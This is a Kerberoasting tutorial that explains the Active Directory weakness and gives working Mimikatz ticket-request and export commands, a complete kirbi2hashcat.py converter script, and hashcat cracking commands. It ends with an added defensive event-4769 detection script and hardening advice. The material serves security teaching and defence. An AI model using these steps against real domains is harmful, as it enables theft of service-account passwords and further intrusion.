Kerberoasting is an attack that allows any normal domain user to obtain a service ticket encrypted with a service account's password hash; if that service account is configured with a weak password, the attacker can recover the clear-text password from the ticket offline.
Why and How Kerberoasting Is Possible
Kerberoasting is possible because of the architecture of Kerberos and because of users' insecure behavior.
To understand exactly why and how Kerberoasting works, you first need to know how Kerberos itself works.
The Kerberoasting attack focuses on accounts with SPNs. Host-based SPNs belong to computer accounts, which have 128-character passwords that are changed every 30 days, but a user account with an SPN is different: its password is "human-made" and is often weak, may never expire, and is rarely changed.
Once the attacker has access to any account in Active Directory, the attacker requests a ticket for the service.
The DC generates a TGS and encrypts it with a key derived from the service account's password.
The DC passes this ticket to the user, at which point the attacker can extract it from memory and crack it offline.
Kerberoasting Demo
The simplest way to do Kerberoasting is with Mimikatz; you can run the attack in the laboratory that we have built.
You can get Mimikatz from here: https://github.com/gentilkiwi/mimikatz/
You might also find the Get-SPN.ps1 script useful, which lists the SPN accounts for you;
you can get it from here: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
I personally love to use hashcat to crack hashes, and I use the kirbi2hashcat.py script (written in Python 2) to convert kirbi files (exported tickets) to hashcat format. You can copy the script from here:
#!/usr/bin/env python
# Python 2 only: relies on str.encode("hex") / str.decode("hex") and on
# file bytes being read as str.
# Based on the Kerberoast script from Tim Medin to extract the Kerberos tickets
# from a kirbi file (https://github.com/nidem/kerberoast).
# https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/kirbi2john.py
# Modified by Laox to use with hashcat
from pyasn1.codec.ber import decoder
import sys

if __name__ == '__main__':
    m = "exported mimikatz kerberos tickets"
    if len(sys.argv) < 2:
        sys.stderr.write("Usage: %s <%s>\n" % (sys.argv[0], m))
        sys.exit(-1)
    for f in sys.argv[1:]:
        with open(f, 'rb') as fd:
            data = fd.read()
        if data[0] == '\x76':
            # process a raw .kirbi file (ASN.1 BER, APPLICATION 22 = 0x76)
            # rem dump
            etype = str(decoder.decode(data)[0][2][0][3][0])
            if etype != "23":
                # only RC4-HMAC (etype 23) tickets are usable with hashcat -m 13100
                sys.stderr.write("Unsupported etype %s seen! Please report this to us.\n" % etype)
            et = str(decoder.decode(data)[0][2][0][3][2])
            # hashcat format: $krb5tgs$<etype>$<16-byte checksum>$<rest of ciphertext>
            sys.stdout.write("$krb5tgs$%s$" % etype + et[:16].encode("hex") + "$" + et[16:].encode("hex") + "\n")
        elif data[:2] == '6d':
            # process a text file holding hex-encoded tickets, one per line
            for ticket in data.strip().split('\n'):
                etype = str(decoder.decode(ticket.decode('hex'))[0][4][3][0])
                if etype != "23":
                    sys.stderr.write("Unsupported etype %s seen! Please report this to us.\n" % etype)
                et = str(decoder.decode(ticket.decode('hex'))[0][4][3][2])
                sys.stdout.write("$krb5tgs$%s$" % etype + et[:16].encode("hex") + "$" + et[16:].encode("hex") + "\n")
If you have all the tools ready, run Get-SPN.ps1 and pick the target; once you do, copy its SPN and open Mimikatz.
Now run this in Mimikatz:
kerberos::ask /target:SQLServer/sql.network.local:4112
which requests a TGS from the DC for you. Next you need to run:
kerberos::list /export
and the TGSs in memory will be exported to .kirbi files; pick the one you need and copy it to your machine.
Now we can crack it offline.
Call the kirbi2hashcat.py script, pass the kirbi file to it, and save the output in a txt file like this:
python2 kirbi2hashcat.py 2-5124124123BLABLABLA.kirbi > hash.txt
Now you have a hash that is crackable with hashcat (mode 13100 is Kerberos 5 TGS-REP, etype 23). To start cracking, run:
hashcat -m 13100 hash.txt yourwordlist.txt
After some time you'll have the ticket cracked, which gives you the clear-text password for the SPN account.
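The converter only handles etype 23 (RC4) and hashcat mode 13100 cracks exactly that, so the same property gives a defender a detection hook. The following is an added example (not from the original post or from any of the tools it links) that runs over constructed Windows Security event 4769 records and flags accounts that request a burst of RC4 service tickets for user-account SPNs; the field layout, the window and threshold values, and the machine-account rule (service names ending in `$`) are assumptions for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records from Windows Security event 4769 (A Kerberos
# service ticket was requested): time, requesting account, service name,
# ticket encryption type, client address. Names ending in '$' are machine
# (host-based) accounts with long, auto-rotated passwords.
EVENTS_4769 = [
    ("2024-05-01 10:00:01", "alice", "DC01$",      "0x12", "10.0.0.5"),
    ("2024-05-01 10:00:03", "alice", "svc_sql",    "0x17", "10.0.0.5"),
    ("2024-05-01 10:00:04", "alice", "svc_http",   "0x17", "10.0.0.5"),
    ("2024-05-01 10:00:04", "alice", "svc_mssql2", "0x17", "10.0.0.5"),
    ("2024-05-01 10:00:05", "alice", "svc_backup", "0x17", "10.0.0.5"),
    ("2024-05-01 10:30:00", "bob",   "svc_sql",    "0x12", "10.0.0.9"),
    ("2024-05-01 10:31:00", "bob",   "FS01$",      "0x17", "10.0.0.9"),
]

RC4_HMAC = "0x17"  # etype 23, the only type kirbi2hashcat.py / mode 13100 handle

def rc4_user_spn_requests(events):
    """(account, service, time) for every RC4 ticket request to a
    non-machine service account; these are the crackable tickets."""
    hits = []
    for ts, account, service, etype, _client in events:
        if etype.lower() == RC4_HMAC and not service.endswith("$"):
            when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
            hits.append((account, service, when))
    return hits

def roasting_suspects(events, window_seconds=60, threshold=3):
    """Accounts that pulled >= threshold distinct user-SPN RC4 tickets inside
    any window_seconds span. A single RC4 request is normal noise; a burst
    of them is the signature of an SPN sweep."""
    by_account = defaultdict(list)
    for account, service, when in rc4_user_spn_requests(events):
        by_account[account].append((when, service))
    suspects = {}
    for account, reqs in by_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            window = timedelta(seconds=window_seconds)
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                suspects[account] = sorted(services)
                break
    return suspects

if __name__ == "__main__":
    for account, services in roasting_suspects(EVENTS_4769).items():
        print("possible Kerberoasting by %s: %s" % (account, ", ".join(services)))
```

The same fields point at the fix the post implies: long, rotated passwords (or group managed service accounts) for user-account SPNs, and AES-configured service accounts so that RC4 tickets are not issued for them in the first place.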
And that was all for today's Kerberoasting guide. Happy Hacking.